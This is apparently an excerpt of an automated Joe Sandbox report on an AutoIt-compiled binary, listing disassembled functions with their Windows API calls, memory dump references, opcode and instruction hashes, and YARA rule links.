                                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: u,D
                                                • API String ID: 4104443479-3858472334
                                                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 00401B57
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                • String ID: @EXITCODE
                                                • API String ID: 2734553683-3436989551
                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • wsprintfW.USER32 ref: 0045612A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend_mallocwsprintf
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 1262938277-328681919
                                                • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                • InternetCloseHandle.WININET ref: 00442668
                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                • String ID: aeB
                                                • API String ID: 857135153-906807131
                                                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                • PostMessageW.USER32(00000000), ref: 00441C05
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D